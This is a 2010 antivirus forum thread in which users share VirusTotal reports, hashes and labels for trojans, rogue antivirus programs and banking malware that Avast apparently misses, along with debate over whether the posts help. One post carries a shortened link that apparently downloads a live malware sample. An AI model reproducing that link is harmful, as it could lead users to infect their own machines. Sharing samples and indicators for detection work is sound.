Avast WEBforum
Other => Viruses and worms => Topic started by: Lisandro on September 20, 2010, 01:45:21 PM
-
As my first thread get hijacked and closed without even warning me :P, I'm starting a new one trying to help avast improving detection if possible.
Please, post only VirusTotal links and do not post links to malware!
You can always submit a sample through Chest or zip it and send to virus(at)avast(dot)com.
Watching this thread means an out of bound work for our analysts, therefore the links should provide an additional information.. you should always know why exactly the link posted by you has a bigger priority than samples sorted out by our internal systems, otherwise it's a waste of time on both sides... you can write a script for browsing virustotal results and posting them here, but what will be their benefit for us? we'll receive the files and metadata anyway from virustotal (on a regular basis of sample submission) so it means an extra manual work that duplicates what a machine does for us.
Guideline for posting links which make some sense:
1. you know the origin/behavior/way of spreading of the sample (it comes from a machine that you recently disinfected e.g.)
2. the sample is not an adware, toolbar or such low-risk malware/PUP
3. you're able to write related metadata either to VT comments or here
-
Cassino game virus? http://www.virustotal.com/file-scan/report.html?id=16677001425a2306a4fadd980e84b048e8638972ca5b760c27de5afba43a7dd6-1284977670
Trojan downloader? http://www.virustotal.com/file-scan/report.html?id=b155f733a4a76a5f2f1cf2bedfa0cbf998d5ea483e7061f54d9d54a325ad1358-1284903634
http://www.virustotal.com/file-scan/report.html?id=3d1a0e751c8807d1add568576bae8709a8a4661bcd5add8924cc8509f2987d4b-1284975567
Zbot sample? http://www.virustotal.com/file-scan/report.html?id=87d184e9a44e628e217d89b91edff75474e0f682a68a26ac9d6ab650b7249d12-1284979078
http://www.virustotal.com/file-scan/report.html?id=8767ed77b8dc95cdae010d2241385c0e4ae376796024822eae41653a0f76ceab-1284967493
Kazi sample? http://www.virustotal.com/file-scan/report.html?id=2920cba61b1b33d94efdf09458562dc03595aa1d1cddc0135f7e060f9174c011-1284819562
Renos sample? http://www.virustotal.com/file-scan/report.html?id=52c65496937759dee1e63dd533fa3f0d6ff87beae1734f81c56896d71e7b9e6e-1284743283
Suspicious? http://www.virustotal.com/file-scan/report.html?id=43dfad5c0c2e4a3c6cc8e7955b0f0380f9fedf70765770e6c1f3dec05c79c653-1284978756
-
http://www.virustotal.com/file-scan/report.html?id=8b66cd525e28891f8d57bb1c7ea502c1f61e9d3dd9deb7045b744d9b41e460e5-1284986446
-
http://www.virustotal.com/file-scan/report.html?id=6b60b0e9007c7e6d5f7b8d560ec2b2c575f5df5f2169a5e2f096e9376785033e-1284998326
Trojan dropper: http://www.virustotal.com/file-scan/report.html?id=c6373b689fb84cadfcf62efeda2693be7edc829c74caa37f248c270e9959b136-1284999866
Trojan? http://www.virustotal.com/file-scan/report.html?id=9c6049c7cef384e2e57ebefc24186c8fedc10420d39f7b35e03500b214dd80dd-1284994178
Renos sample? http://www.virustotal.com/file-scan/report.html?id=0153b95db49bb9150c9dbd35bb5eb520c852888ce7921cf30bc32de829a99b56-1284982191
-
Trojans?
http://www.virustotal.com/file-scan/report.html?id=f28dafcaf4c723342f53a43ad4cd7980bde5d7d48e6b677cbf0018974ec376f9-1280972203
http://www.virustotal.com/file-scan/report.html?id=543b88457cd1d956fdf0712a07777d10dbb1189b61b58d7ae0e0e8de96664bef-1283388730
-
Renos or FakeAV
http://www.virustotal.com/file-scan/report.html?id=20d7c5fa8ebdc2bbbbafc93d2ee04b90604d12d4696fae69dcf49514b37697a5-1285017531
-
Trojan-Downloader
http://www.virustotal.com/file-scan/report.html?id=dfb116c2c4687fb27ec2c9252e9c5296708c0f201255b7abadaa68e488a60b2a-1285060322
-
Virut? http://www.virustotal.com/file-scan/report.html?id=087cb18f688665a7a05fbea067df6b5d44d35a6b95808e7601698d69e8330181-1285062806
Suspicious: http://www.virustotal.com/file-scan/report.html?id=42bc40621711772252eeec7b0a9e4a55e97f9f21c8e87426d1a4948f951a0ccb-1285062639
Buski? http://www.virustotal.com/file-scan/report.html?id=bcb9dcea286bbb8612f57172013197a0c397e15091d89f9716dfba3b7d182dcb-1285067075
Sent by IM to Maxx the links to download (some of) the samples.
-
Undetected malware http://www.virustotal.com/file-scan/report.html?id=0204be4d8b3a25c58975a0db406fe1cc6e61d3af19d61cc2ea9b2a5db68896ae-1285088907
-
New nagware / rogue, NavaShield ( navashield.com ) see video http://www.youtube.com/watch?v=0hxFyDpfcg0
Malwarebytes / Ad-Aware / F-Secure have added detection, 53mb installer
-
http://www.virustotal.com/file-scan/report.html?id=994a5bc0e21a3b89441e5b70720ef6ba62aa9a0d4a71b33e995766d1d12007f4-1285185342
::)
-
A new rogue A/V program.
http://www.virustotal.com/file-scan/report.html?id=f901ce8b019eca2ddb850fb0783196f28bd3ad33bb321d995371a00b00c70fda-1285225279
-
Another rogue A/V program.
http://www.virustotal.com/file-scan/report.html?id=32582fc3673aba5e57b14b40a2f60ce975afec06a88b9d717661b5f497724ab3-1285296706
And a Trojan.
http://www.virustotal.com/file-scan/report.html?id=52efcdbdf08321cf1fb645c92c97378bde509dda3c15622d96276332284f80f6-1285307240
I've spent the evening passing these around.
-
http://www.virustotal.com/file-scan/report.html?id=e7e2d69c740ca5009ed76f191e2b6706b283f58f8a0fdc1054841929dddee7a1-1285349976
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=d7dbb27f2eb5772d33362645bac7392c2699b08a69e8d8b0d39f98f7dcaaac08-1285371168
And another.
http://www.virustotal.com/file-scan/report.html?id=b9cbec787f7d72c3072bb70d611a47bdeee319a9bc28b65d473f3235b0a5eb8e-1285396797
-
I am very angry !
<<rapidshare links>>
damnit, read the topic name - virustotal links only
-
damnit, read the topic name - virustotal links only
Know.Purposely !
-
@Burkoff
as you see in the topic name VIRUS TOTAL LINK ONLY
this is what happend the last time http://forum.avast.com/index.php?topic=63749.0 see the two the last post`s
so edit the post and remove the download link`s
-
yeah and Burkoff was already responsible last time, since he's doing that again I suggest a ban.
-
damnit, read the topic name - virustotal links only
Know.Purposely !
Send the samples to Avast! via the interface (trough the chest) or otherwise (don't remember how) NOT POST THEM HERE!
-
a ransom ;D
http://www.virustotal.com/file-scan/report.html?id=27cc321356d59261ccc711e71651ad68219b041dd3ef999344085ab668bd0c02-1285361736
-
yeah and Burkoff was already responsible last time, since he's doing that again I suggest a ban.
yea....but he is already very angry ;D
I am very angry !
-
just a question: I'm not testing samples and I won't, but for those who do post about stuff missed by Avast, does it make a difference (or not) if heuristic sensitivity is set to high in the web and file system shields?
edit: would be nice if people didn't just post the VT results, but also their own and specify their settings (yeah, I know, this supposes a VM or sandbox...that's just a suggestion).
-
The list came from VirusTotal's Top10 file submissions (Yesterday)
http://www.virustotal.com/file-scan/report.html?id=9ef6116b0e3e1f663e48b76dc2957d97187f7414be0024b721569d67d378ff56-1285448595
http://www.virustotal.com/file-scan/report.html?id=820c0fd3d36354fe2d0f0db9051b1c5164d6b85fd80d922732a105a886f01844-1285445333
http://www.virustotal.com/file-scan/report.html?id=1f5b7c646092641618b79557a47dcc8eba3f96d8f82673568d9d124f5c3fd90a-1285451627
This could be a false positive:
http://www.virustotal.com/file-scan/report.html?id=017c62ee87dfc53f32b774d867f11be1c94911735d051312979861174a7020b0-1285270314
-
Fake ZillaTube:
http://www.virustotal.com/file-scan/report.html?id=c2b7e07688acdcd107fd236532d7156fe0b324b597c0623653e8a1a14958caed-1285510931
Another VirusTotal's Top10 file submissions(Yesterday)
http://www.virustotal.com/file-scan/report.html?id=9ef6116b0e3e1f663e48b76dc2957d97187f7414be0024b721569d67d378ff56-1285475821
http://www.virustotal.com/file-scan/report.html?id=afbcfe0f0301c5cdb1202ea75f406a04cc9023d34e347e89311f9835bd5c3af9-1285483928
http://www.virustotal.com/file-scan/report.html?id=820c0fd3d36354fe2d0f0db9051b1c5164d6b85fd80d922732a105a886f01844-1285445333
------------------------------------
Could be false positive:
http://www.virustotal.com/file-scan/report.html?id=f609efee5fa8df832ce7708ed58f32021d928089404689eb90ddc1f73d8cd32f-1285105620
------------------------------------
http://www.virustotal.com/file-scan/report.html?id=1f5b7c646092641618b79557a47dcc8eba3f96d8f82673568d9d124f5c3fd90a-1285464329
http://www.virustotal.com/file-scan/report.html?id=be798c739c255751a6520fd837e4deda4746a7edda8c41ba21b3a9d3b7480fbc-1285136103
http://www.virustotal.com/file-scan/report.html?id=ddf72f981e472913e2bf0dd49b2d3c02e37afb7d9146baf0af91553f146a6a67-1285471642
http://www.virustotal.com/file-scan/report.html?id=9bb1fb490e81a087534d6b2d2ff6cf57c8fb8f09040165ffb07bb19873e2ebc8-1285471555
http://www.virustotal.com/file-scan/report.html?id=2e49fa656ab38cc7fa296a319d62005457b0fb49993e85dcf410c9bfe055c68b-1285224826
http://www.virustotal.com/file-scan/report.html?id=c56c57f44860fc1caa68d4361a0855780945925c65b39b00826b48ef9a31d155-1285481706
-
i Have one link from Virustotal, Avast found it, i Have on link from Jotti's malware scan Avast dont Find it on Same virus sample why?
http://www.virustotal.com/file-scan/report.html?id=9266c4084e41982ddf7e365be679e53842da37c1bccc5269d2723fdfabeee420-1285516483
-
Have one link from Virustotal, Avast found it, i Have on link from Jotti's malware scan Avast dont Find it on Same virus sample why?
VT and Jotti may not be on the same update yet ?
-
ahh now i see last update on malware jotti was 2010-09-14 for Every AV there :O
now They updated :) avast Detect it !
-
http://www.virustotal.com/file-scan/report.html?id=3c36409d24180488f584155defff7498374f47051c0bcccbbd9a8445a6130d05-1285488260
-
ahh now i see last update on malware jotti was 2010-09-14 for Every AV there :O
now They updated :) avast Detect it !
Jotti also uses Linux versions of AVs I believe, not to mention has nowhere near the number of scanners of virustotal (currently 43), so personally that is the only multi-scanner site I would use.
-
Hi DavidR,
But the folks that report missed samples through VT links, should check there again for more recent results, also sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
polonus
-
Trojan.
http://www.virustotal.com/file-scan/report.html?id=7fae8f44ca6ac0119692ca1080f07173bd5d4f170cd412bc261e4328ac283dde-1285557252
Fake Codec Pack.
http://www.virustotal.com/file-scan/report.html?id=637a685f6cdaf0b50ab2f910dba177fb4ab64a7def1d2102de9684d55417b6b8-1285555478
Fake Antivirus Program.
http://www.virustotal.com/file-scan/report.html?id=e38d310882d6057da15048b429858748452df166c5a70521043fe2fdca3e00c6-1285559703
-
damnit, read the topic name - virustotal links only
Know.Purposely !
Send the samples to Avast! via the interface (trough the chest) or otherwise (don't remember how) NOT POST THEM HERE!
Send a password protected zip file ( Password: virus) to virus@avast.com with the subject "Undetected Malware", Put the password in the body of the e-mail.
-
http://www.virustotal.com/file-scan/report.html?id=24fde02323b42f8cb48acff5414118690e41ff79f37c4ce43573f13387e954c3-1285585170
-
Possible Trojan.
http://www.virustotal.com/file-scan/report.html?id=682623d7aa70209c4e39eb5deb0851a8da53fd2d1f048fa31619c4233b438fb3-1285641801
Another Trojan.
http://www.virustotal.com/file-scan/report.html?id=b46244c2191de3f5e8eecf16511facbf4c3a98b91ca2604b1d7a6490a36e626a-1285644196
-
Another fake AV.
http://www.virustotal.com/file-scan/report.html?id=8beb25df7bcf9b2c80f6f1f8fc7bdf26e55ae97df4df477094f3ebb2dd1a1189-1285739163
-
http://www.virustotal.com/file-scan/report.html?id=9fcfe985ff93d493ae8c091566b6524deb114748a5a5018f80d797c658311e14-1285836908
http://www.virustotal.com/file-scan/report.html?id=6a17b1626a22aaaf87bb8b1ad173f91b85f2ab4a863a4b4ec5227e8ba4f02879-1285831256
backdoor: winlogon.exe connected to 74.55.58.173 under weird url like 2-3-v-5-6-l-w-1-q-9-j-n-6-2-n-8-...
avast disabled by: programs will be disabled or shall we say redirect to this winlogon.exe at this registry [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
programs running: winlogon.exe under windows current user name with svhost.exe child process
version: 206
how to keep your programs running?
put all access to this registry in read only...
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
this is the 3rd time same virus variant undetected but every time I've uploaded to avast virus-lab It took a week before avast detects(update config every 5mins).
-
http://www.virustotal.com/file-scan/report.html?id=de2a6bc545a34cc4f3644936c544960dde26377317f543f30c50670a22192e0e-1285782978
http://www.virustotal.com/file-scan/report.html?id=7d6df2766434882417f243e236c192fbee5c8c1479858c6dde5c001d31ee13d8-1285790457
http://www.virustotal.com/file-scan/report.html?id=dec90d6cacde9d8c96addfaee8b6b88a3f0072ba7860a81a0bd1ca95cdc9079e-1285801510
http://www.virustotal.com/file-scan/report.html?id=2bbba7c64d0fc0ad05f6079838a7663f71f0bd5028f67da3af42757417c83486-1285846090
off topic: a link for you marc57 http://www.youtube.com/watch?v=ce87ckRKrzk kiss madiam won greece got talent,well done ;D ;D
-
Thanks for the link Left123.
-
http://www.virustotal.com/file-scan/report.html?id=842080c6fcf6418ca93f86fd036beede353b2585f28a523f18381526424376e3-1285835020
http://www.virustotal.com/file-scan/report.html?id=61aac71f0b59c6f008307ab38b4cc8beba7c88189e9cebc63607b3fd39ebb89b-1285942131
-
http://www.virustotal.com/file-scan/report.html?id=7d6ee800c86e3a5fdda89412cf77c7d804847d3fe329ea719bf3734c8c9d5ebf-1285954899
http://www.virustotal.com/file-scan/report.html?id=6f83d51a7eaf9b80ca435fc569e88a99b2ddfede9f6538c2615abb1e9f1b5283-1285939272
http://www.virustotal.com/file-scan/report.html?id=51811522f2f121e40eae7c7a039cf07a002b1abba486639121a60150e2fef691-1285860246
-
http://www.virustotal.com/file-scan/report.html?id=2182a74eb586381e6f119d9ada42743e306ee5b185ae04ae6b216ae95d676147-1286026600
-
I like this thread..!
Thanks, Tech..!! :)
asyn
-
I like this thread..!
Thanks, Tech..!! :)
asyn
You're welcome.
Although I was alerted that just posting virustotal links without further information about the origin of the file, behavior, etc. is just adding manual work for the virus analysts that are receiving 50.000 samples per day.
They have quite some honeypots and they're not really worried about the links posted here.
You could not agree with that.
They do not post in forum about it (clearly).
-
I like this thread..!
Thanks, Tech..!! :)
asyn
They have quite some honeypots and they're not really worried about the links posted here.
I don't doubt that..! ;)
Nevertheless it's interesting information for us...!!!
asyn
-
If you want to get frightened, here we goes...
http://www.virustotal.com/file-scan/report.html?id=377f8601a5f3868a5290193844abafa24d54aca366a3f6b51ce33c9627ec1545-1285835021
http://www.virustotal.com/file-scan/report.html?id=3ec7149c46e54e81eea95cb0ca8cb20eaff21d785967c4de1305204f76fe6290-1285847507
http://www.virustotal.com/file-scan/report.html?id=962c7856d2d6b4c5ce2921dc5cc5bad516623361541a677f1f5349be474eecc3-1285835130
http://www.virustotal.com/file-scan/report.html?id=35c51fbfd9a713ceaf1a792f8aeba95cd47fe88bc3dc781a99f1d208c63928cc-1286026435
http://www.virustotal.com/file-scan/report.html?id=8ad3165eba03c2bd92dedbc89a5c13700cc289e2d636e7a4f2adb4cb90cce948-1286022745
http://www.virustotal.com/file-scan/report.html?id=b61fd3beea501c83ae6f0b1a2a5fd00366dbb2744ab480c814dbe4e3578cdfd0-1286017983
http://www.virustotal.com/file-scan/report.html?id=12e5efddd690c52fcc751a93aa16c2216d2107cc2b164eaa9984b312a3ab0f43-1286017451
http://www.virustotal.com/file-scan/report.html?id=18b1ac1ce2bbc3214004a9edcd64a1383ffdc5ea364b6e64d82802ff54e84566-1286017643
http://www.virustotal.com/file-scan/report.html?id=31095bd923240423b3234e8d874ef95b518f53da5792bbd081b4d001fbcd6094-1286005492
http://www.virustotal.com/file-scan/report.html?id=31137bcdf67b3b70c864058af25aba5c97ea54ce55825bb258d56d5a1cdc99a5-1286005652
http://www.virustotal.com/file-scan/report.html?id=63a9b83764282c748a2621c10948c766f5617146dd988c97691541db6c4730f3-1286005660
http://www.virustotal.com/file-scan/report.html?id=174f53b2f6615b0f2cfd1b1fd27456009c3f5015f6789e67b53e89cff677d506-1286005676
... and so on...
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
I also don't see how the average user would be coming into regular normal browsing contact with these, which you are obviously seeking out. Most regular users aren't seeking out malware in this way.
Yes, they could get tricked into downloading something from a search result, but how would this topic help them in any case, it doesn't.
As you have already said the VT links are of little use to the virus labs team, they need the samples to analyse.
<snip>
Although I was alerted that just posting virustotal links without further information about the origin of the file, behavior, etc. is just adding manual work for the virus analysts that are receiving 50.000 samples per day.
They have quite some honeypots and they're not really worried about the links posted here.
<snip>
So it is clear that the sample and information needs to be sent to avast, rather than posting VT links and you can't go posting links to file sharing sites or the origin of the sample, for the very reason the other topic was closed.
That is why I feel this is pointless in this context, not to forget as polonus mentioned, it shouldn't be post and forget, but go back and confirm if the original post is now detected or a false positive.
<snip>
But the folks that report missed samples through VT links, should check there again for more recent results, also sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
<snip>
Over time (now on 4 pages) all you see are missed samples and zero input on samples now added to the database or considered to have been false positives, or all you see is an unbalanced/one sided view.
As you say "If you want to get frightened, here we goes..." the object surely is not to frighten users ???
If it is to improve detections, then you need to send the samples and information to avast as the VT results in isolation are pretty worthless. Especially if those who post them don't follow up to see if they are added or are FPs.
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
Have been thinking the same.....how will this improve detection if you don`t send the samples ?
or does Tech know something we don`t
-
I honestly don't see the purpose of this topic as it achieves little (or the other one that got closed).
The other one was closed because people post open links to malware I think.
I also don't see how the average user would be coming into regular normal browsing contact with these, which you are obviously seeking out. Most regular users aren't seeking out malware in this way.
Sure. But not all the avast users are "regular normal browsing"...
As you have already said the VT links are of little use to the virus labs team, they need the samples to analyse.
They could get them from virustotal as they have the MD5 of the file.
I'm not posting links quite some weeks ago as the avast team just said they won't stop their analysis to manual check the links here. It was becoming useless without the avast team being able to add the definitions.
At least, posting here can show:
1. avast protection needs to be increased. And there are users that can't even talk about that.
2. avast team could post or react to threads about security and drop some light and knowledge on how to get protected.
But the folks that report missed samples through VT links, should check there again for more recent results, also sometimes results are found to be false positives, see the link Left123 gave above. So do your homework properly.
I always check more recent results.
Did you try my links just after they were posted?
Over time (now on 4 pages) all you see are missed samples and zero input on samples now added to the database or considered to have been false positives, or all you see is an unbalanced/one sided view.
So, which should improve here? Our posting about missdetections or acknowledgment from avast team?
If we're posting false positives, could it take a while to say that for us? Why not?
As you say "If you want to get frightened, here we goes..." the object surely is not to frighten users ???
Ok, I was thinking that people need to discuss these issues, nothing more.
-
Pondus has showed me a link to http://www.shadowserver.org/wiki/pmwiki.php/Stats/VirusDailyStats
Seems a good source for what I'm trying to talk about.
-
some weeks ago i made a topic about some trojan.ransoms and i only posted VT links,and after about 1 day an avast techinical said:samples should be detected now,i only posted vt links and the samples were in the next virus database update
-
some weeks ago i made a topic about some trojan.ransoms and i only posted VT links,and after about 1 day an avast techinical said:samples should be detected now,i only posted vt links and the samples were in the next virus database update
Lucky you... Our samples did not have that luck :'(
-
Loss of time and labor ...
The avast team will not improve the service of automatic analysis.
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? :P // don't try to tell me, there are no such links :-X
as Tech already mentioned: watching this thread means an out of bound work for our analysts, therefore the links should provide an additional information.. you should always know why exactly the link posted by you has a bigger priority than samples sorted out by our internal systems, otherwise it's a waste of time on both sides... you can write a script for browsing virustotal results and posting them here, but what will be their benefit for us? we'll receive the files and metadata anyway from virustotal (on a regular basis of sample submission) so it means an extra manual work that duplicates what a machine does for us.. here's a guideline for posting links which make some sense:
1. you know the origin/behavior/way of spreading of the sample (it comes from a machine that you recently disinfected e.g.)
2. the sample is not an adware, toolbar or such low-risk malware/PUP
3. you're able to write related metadata either to VT comments or here
Henrique - Bankers is what bothers you, right? we're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue.. if you have better samples, we can talk about a processing of your submission through our ftp (a daily uploaded batch with a predefined name), if you prove the quality of your feed, we can dedicate someone to its processing maybe..
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? :P // don't try to tell me, there are no such links :-X
+1 ;)
-
Henrique - Bankers is what bothers you, right? we're receiving samples from Bank of Brasil (and maybe other institutes in Brasil), but it's probably not enough to cover this regional issue.. if you have better samples, we can talk about a processing of your submission through our ftp (a daily uploaded batch with a predefined name), if you prove the quality of your feed, we can dedicate someone to its processing maybe..
Maxx
What do you attribute the better performance of the Avira in the proactive tests of AV-Comparatives?
-
bigger viruslab, PCK/*Anything* detections etc.. but i haven't seen the diff between our and their misses, actually noone except the testers did, afaik..
-
guys, what about posting VT links where avast kicks ass (to keep the balance in our universe)? // don't try to tell me, there are no such links
here is 10 ;)
http://www.virustotal.com/file-scan/report.html?id=d86a657eb61fdeb35c860195ba63dd46232879b8149d67ed19d6e968b6f42b2c-1284988129
http://www.virustotal.com/file-scan/report.html?id=edbae8d422bb214fe8ed32508014049c63313d99d0799d715db296ff250dbf50-1286200623
http://www.virustotal.com/file-scan/report.html?id=4126238d30c0ccf5b728f45cec2562211ff32134690d92e284c0a42fc654c49b-1286041890
http://www.virustotal.com/file-scan/report.html?id=ae5a41f85c5596b04a42192cd312f62e8bc28d004bb06a75caddb74a32fc2b66-1286098541
http://www.virustotal.com/file-scan/report.html?id=b6c7eb42f334152f9639afb2e94047a4589f9ddb2e35e107071acceae63549fe-1286208222
http://www.virustotal.com/file-scan/report.html?id=173ebcfb864c0696a27f1af39f507ae3f4b2b2f4ac3cad114399afefc91f13b3-1286224245
http://www.virustotal.com/file-scan/report.html?id=b766c608b633565c5731efe3072f79136c80f9bd80c7c964121aec8d92795d9c-1286059454
http://www.virustotal.com/file-scan/report.html?id=8a02368d89838c95440a6e55ac6df080346fbbe250a0ac0bedd11de377cd7c68-1286128000
http://www.virustotal.com/file-scan/report.html?id=8b28241a9a20b7b4239c99da510f8e8c57eabe394c3842e019c294d22b52f933-1282671548
http://www.virustotal.com/file-scan/report.html?id=c0aff3d4af9fbafd51faeb4ce61d4a3991823d598831a0f211a2cf3fc252bceb-1285234188
-
Maxx, I've changed the original post accordingly.
New posters, please, read the first post.
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
VirusTotal - 1txW0 - 4/43
http://www.virustotal.com/file-scan/report.html?id=82cd86f7e8f8aa6a566678194c59a15383a7446e3e09233d08bdd3f5c5568f1d-1286268778
NoVirusThanks - 1/16 - INFECTED
http://scanner2.novirusthanks.org/analysis/c9e49130a8c2332a0b709da55d9f92a9/cGljNjc1Nzk5MDc0NTMzLWpwZy13d3ctZmFjZWJv/
Malwarebytes detect as Trojan.Downloader
sample sendt avast!
-
http://www.virustotal.com/file-scan/report.html?id=18f4cfd6275127e80a0a0e9574747e0c10aee5fbfe0722a338ff55e68a71d0fa-1286264334 (http://www.virustotal.com/file-scan/report.html?id=18f4cfd6275127e80a0a0e9574747e0c10aee5fbfe0722a338ff55e68a71d0fa-1286264334)VT
Rogue av installer
-
VirusTotal: 15/38
http://www.virustotal.com/file-scan/report.html?id=a5952f757310dcdddca5e3263c0198918409792fd93ab6d818eec765dba80779-1286322708
Trojan Downloader
MD5 : 3dc9a53e3f167812c0a54c3d2e2179c0
SHA1 : 4e0fe867b630e8067e6b394078e06c728fd52080
SHA256: a5952f757310dcdddca5e3263c0198918409792fd93ab6d818eec765dba80779
-----------------------------------------------
EDIT.:
VirusTotal: 10/40
http://www.virustotal.com/file-scan/report.html?id=7f062b4b5967ee675136c66dbb689a992b3e5c76d207c5ef332c3602556d2b95-1286324059
Trojan Downloader
MD5 : 03377e95f6f65bcad53b5f5de7e7d3e1
SHA1 : 86542c0cc681b26131c7b55ff3c9031f10049fa1
SHA256: 7f062b4b5967ee675136c66dbb689a992b3e5c76d207c5ef332c3602556d2b95
-----------------------------------------------
EDIT.2:
VirusTotal: 28/43
http://www.virustotal.com/file-scan/report.html?id=1d84be7aced4e4dae1cfd202efcb837edab28f131e6ed5b8ebd3473ae5092f97-1286324820
Trojan.Crypt
MD5 : c970b258d7f5e27ee204200c55008d42
SHA1 : 97c65f6aa34a4c467e162729a7c4440786d6695d
SHA256: 1d84be7aced4e4dae1cfd202efcb837edab28f131e6ed5b8ebd3473ae5092f97
-
Rogue AV program.
http://www.virustotal.com/file-scan/report.html?id=5d00afa237c062d7a0a0d0bb8702f6ab570251bd7f2e1692aa256910fa7a5375-1286335475
Koobface trojan.
http://www.virustotal.com/file-scan/report.html?id=26c57e851ce7c0eab4b4c97cc8c6a5c7d6cfec340d1969f32602ebd6a5d6ece4-1286337613
Trojan.
http://www.virustotal.com/file-scan/report.html?id=78032e3651690ebc1d0ff150881a57d3492c72ab4e1418ee25d96404a04e3b0c-1286382005
-
Trojans?
http://www.virustotal.com/file-scan/report.html?id=f28dafcaf4c723342f53a43ad4cd7980bde5d7d48e6b677cbf0018974ec376f9-1280972203
http://www.virustotal.com/file-scan/report.html?id=543b88457cd1d956fdf0712a07777d10dbb1189b61b58d7ae0e0e8de96664bef-1283388730
the 1st and 2nd one is a virus
-
Sorry.
http://migre.me/1txW0
Attention ! Only experienced users to try!
VirusTotal - 1txW0 - 4/43
http://www.virustotal.com/file-scan/report.html?id=82cd86f7e8f8aa6a566678194c59a15383a7446e3e09233d08bdd3f5c5568f1d-1286268778
NoVirusThanks - 1/16 - INFECTED
http://scanner2.novirusthanks.org/analysis/c9e49130a8c2332a0b709da55d9f92a9/cGljNjc1Nzk5MDc0NTMzLWpwZy13d3ctZmFjZWJv/
Malwarebytes detect as Trojan.Downloader
sample sendt avast!
the 1st one is a worm
-
1.http://www.virustotal.com/file-scan/report.html?id=9273fcb7726e27d6ce7d4d6561d92e6beaee8f525208480a91188b03be5bdab4-1285225953#
2.http://www.virustotal.com/file-scan/report.html?id=2d50e814f7fba19ee6612aaa3ea3998736cb9ee7f47879ee08e4a7f5756920ea-1285536786 Trj/CI.A(Panda)
-
VirusTotal: 2/40
http://www.virustotal.com/file-scan/report.html?id=b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec-1286338107
Trojan-Banker.Win32.Banker.bbcy(Kaspersky)
MD5 : 6605aa15e2de9ffa6129b4fe5de0582f
SHA1 : 6ba31ccd445fee3ab5b74bd6097ef78b7f48b01c
SHA256: b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec
-
http://www.virustotal.com/file-scan/report.html?id=f4c23e3c8c51affb73e1d3a73871ea71234ee340c61630eccaa2ad97913c26d4-1286437643
http://www.virustotal.com/file-scan/report.html?id=e2e15ea76804a2de2899be9e11e1cb150d5e88c2e0f32a9b7713b40e56b988cc-1286437648
-
http://www.virustotal.com/file-scan/report.html?id=178e78e5c7b9a8a1cde83eacfb5a10271e417ab45be46f792321fd408daeda6d-1284101083
FAKE AV!
http://www.virustotal.com/file-scan/report.html?id=8593e8ee7bd5c6891e360586ba9fe7a1cc5a4c7d784d440ebe01dc9ab9747b39-1283842972
Koobface
p.s:let's say a thanks to team for their hard work to add samples on next virus database update.
thank you team.
-
Why my sample was not analyzed yet ?
It's happening again ...
VirusTotal: 2/40
http://www.virustotal.com/file-scan/report.html?id=b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec-1286338107
Trojan-Banker.Win32.Banker.bbcy(Kaspersky)
MD5 : 6605aa15e2de9ffa6129b4fe5de0582f
SHA1 : 6ba31ccd445fee3ab5b74bd6097ef78b7f48b01c
SHA256: b5d319e4d5695397fbf4023f640e57bc1de313dd8bca514097bea395defe96ec
----------------------------------------------------------------
EDIT.:
Today was finally detected by avast.
-
http://www.virustotal.com/file-scan/report.html?id=83d8c2539c118d0bd55700c85d605d5db5442094894b541a1e1755732bffab11-1286559056
-
VirusTotal: 19/43
http://www.virustotal.com/file-scan/report.html?id=87beb04a79148247493b3a37825876c29b129bf1edbe1ed828c6ffc8ab4dcd40-1286570395
TR/VB.Downloader.Gen(Avira)
MD5 : c3eeba8fd7acf081ee82bebf6df7978b
SHA1 : 99297bec5a97d608cd8d5778731a1ae4f4ec8043
SHA256: 87beb04a79148247493b3a37825876c29b129bf1edbe1ed828c6ffc8ab4dcd40
----------------------------------------------------------------------------------------
VirusTotal: 9/43
http://www.virustotal.com/file-scan/report.html?id=c183e478ef4b70b248b3fd005c43691805953e74d9e6432c9c968fdfdb451818-1286570694
Trojan-Banker.Win32.Banker2.zz(Kaspersky)
MD5 : e3a58b376b1d22878a32231a17475e25
SHA1 : 6c466543846c5429cf57439df8119db9dd8522a0
SHA256: c183e478ef4b70b248b3fd005c43691805953e74d9e6432c9c968fdfdb451818
-
http://www.virustotal.com/file-scan/report.html?id=151a6e1fb7f2bfbe109e57af0759b52e02c4c50f95fd9eba5b39a9ca6df27edd-1286648404
http://www.virustotal.com/file-scan/report.html?id=2ec649009442d1d94ee8d5b7a3ab957d1c9eeb0495b04df9c851ad240273e1c4-1286623698
http://www.virustotal.com/file-scan/report.html?id=449be1b8efd82f2dc2c5b9a85e1083da85d04ab3d9ce20543e0fbccdd6ba25c7-1286632785
Source:
Top10 file submissions (Yesterday) -- October 9th 2010
-
hello all
http://www.virustotal.com/file-scan/report.html?id=e8653f7692b503be7b1031c2c0635dcd8b67a55ff92a6d72748353e9478a360f-1286643149
TROJAN.FAKEAV
-
VirusTotal: 3/43
http://www.virustotal.com/file-scan/report.html?id=f95fb716da9ea901d7a52b0c955bddd9aed3cfe1769e5f4c15063e1fdb0944fe-1286648795
TR/VB.Downloader.Gen (Avira)
MD5 : e3213d77cc1602bc958980ba707b40a0
SHA1 : 8ec8f807db0efb855cb4317c488141038cf36fc4
SHA256: f95fb716da9ea901d7a52b0c955bddd9aed3cfe1769e5f4c15063e1fdb0944fe
-
Keep posting Henrique. We need a better avast against these banking nasties.
-
Keep posting Henrique. We need a better avast against these banking nasties.
OK !
I'll try to keep.
I hope the avast team has interest.
Represents half of the infections here in Brazil.
-
Represents half of the infections here in Brazil.
Do you have a link to these statistics?
-
